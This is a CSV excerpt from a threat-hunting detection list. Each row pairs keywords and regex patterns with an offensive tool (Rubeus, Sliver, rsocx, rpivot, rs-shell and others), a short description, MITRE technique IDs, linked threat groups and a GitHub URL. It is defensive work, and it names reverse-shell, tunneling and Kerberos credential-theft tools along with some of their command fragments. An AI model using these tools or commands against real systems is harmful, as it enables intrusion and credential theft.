"*rpc-shellcode.go*",".{0,1000}rpc\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57533"
"*rpivot.zip*",".{0,1000}rpivot\.zip.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","57535"
"*rpivot-master*",".{0,1000}rpivot\-master.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","N/A","10","10","589","128","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z","57536"
"*rpm.torproject.org/*public_gpg.key*",".{0,1000}rpm\.torproject\.org\/.{0,1000}public_gpg\.key.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","57537"
"*rportfwd add -r *",".{0,1000}rportfwd\sadd\s\-r\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","57538"
"*rsactftool --*",".{0,1000}rsactftool\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57539"
"*rsactftool* --dumpkey --key *",".{0,1000}rsactftool.{0,1000}\s\-\-dumpkey\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57540"
"*rshijack*",".{0,1000}rshijack.{0,1000}","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","N/A","6","501","43","2024-10-30T12:05:48Z","2018-02-23T02:21:45Z","57545"
"*rsmudge/ElevateKit*",".{0,1000}rsmudge\/ElevateKit.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","57546"
"*rsockstun -*",".{0,1000}rsockstun\s\-.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","0","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","57551"
"*rsockstun-1.1.zip*",".{0,1000}rsockstun\-1\.1\.zip.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","1","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","57552"
"*rsockstun-master*",".{0,1000}rsockstun\-master.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","COZY BEAR","C2","https://github.com/llkat/rsockstun","1","1","N/A","N/A","10","10","53","22","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z","57553"
"*rsocx -l 0.0.0.0*",".{0,1000}rsocx\s\-l\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","57554"
"*rsocx -r *:*",".{0,1000}rsocx\s\-r\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","57555"
"*rsocx -t 0.0.0.0*",".{0,1000}rsocx\s\-t\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","57556"
"*rsocx.exe* 0.0.0.0*",".{0,1000}rsocx\.exe.{0,1000}\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","57557"
"*rsocx.exe* 127.0.0.1*",".{0,1000}rsocx\.exe.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","57558"
"*rsocx-main.zip*",".{0,1000}rsocx\-main\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","1","N/A","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","57559"
"*rs-shell.exe -m *",".{0,1000}rs\-shell\.exe\s\-m\s.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","N/A","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","57560"
"*rtcrowley/Offensive-Netsh-Helper*",".{0,1000}rtcrowley\/Offensive\-Netsh\-Helper.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","57564"
"*RtlDallas/Jomungand*",".{0,1000}RtlDallas\/Jomungand.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","N/A","10","","N/A","","","","57565"
"*RtlDallas/KrakenMask*",".{0,1000}RtlDallas\/KrakenMask.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","N/A","9","","N/A","","","","57566"
"*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*",".{0,1000}RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","57567"
"*rubber_ducky.py*",".{0,1000}rubber_ducky\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","57568"
"*Rubeus createnetonly *",".{0,1000}Rubeus\screatenetonly\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","57569"
"*Rubeus*currentluid*",".{0,1000}Rubeus.{0,1000}currentluid.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57570"
"*Rubeus*harvest*",".{0,1000}Rubeus.{0,1000}harvest.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57571"
"*Rubeus*logonsession*",".{0,1000}Rubeus.{0,1000}logonsession.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57572"
"*Rubeus*monitor*",".{0,1000}Rubeus.{0,1000}monitor.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57573"
"*Rubeus.bin*",".{0,1000}Rubeus\.bin.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","57574"
"*Rubeus.Commands*",".{0,1000}Rubeus\.Commands.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57575"
"*Rubeus.exe *",".{0,1000}Rubeus\.exe\s.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57576"
"*Rubeus.exe asktgt /user:*",".{0,1000}Rubeus\.exe\sasktgt\s\/user\:.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","57577"
"*Rubeus.exe*",".{0,1000}Rubeus\.exe.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57578"
"*Rubeus.exe*",".{0,1000}Rubeus\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","57579"
"*Rubeus.git*",".{0,1000}Rubeus\.git.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57580"
"*Rubeus.Kerberos*",".{0,1000}Rubeus\.Kerberos.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57581"
"*Rubeus.lib*",".{0,1000}Rubeus\.lib.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","57582"
"*Rubeus.Ndr.RPC_*",".{0,1000}Rubeus\.Ndr\.RPC_.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","57583"
"*rubeus.txt*",".{0,1000}rubeus\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57584"
"*Rubeus/1.0*",".{0,1000}Rubeus\/1\.0.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","#useragent","user-agent","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","57585"
"*RubeusAskTgtMenu*",".{0,1000}RubeusAskTgtMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57586"
"*RubeusASREPRoastManager*",".{0,1000}RubeusASREPRoastManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57587"
"*RubeusChangePwManager*",".{0,1000}RubeusChangePwManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57588"
"*RubeusCreateNetOnlyManager*",".{0,1000}RubeusCreateNetOnlyManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57589"
"*RubeusDescribeManager*",".{0,1000}RubeusDescribeManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57590"
"*RubeusDumpManager*",".{0,1000}RubeusDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57591"
"*RubeusDumpMenu*",".{0,1000}RubeusDumpMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57592"
"*RubeusHarvestManager*",".{0,1000}RubeusHarvestManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57593"
"*RubeusHarvestMenu*",".{0,1000}RubeusHarvestMenu.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57594"
"*RubeusHashManager*",".{0,1000}RubeusHashManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57595"
"*RubeusKerberoastManager*",".{0,1000}RubeusKerberoastManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57596"
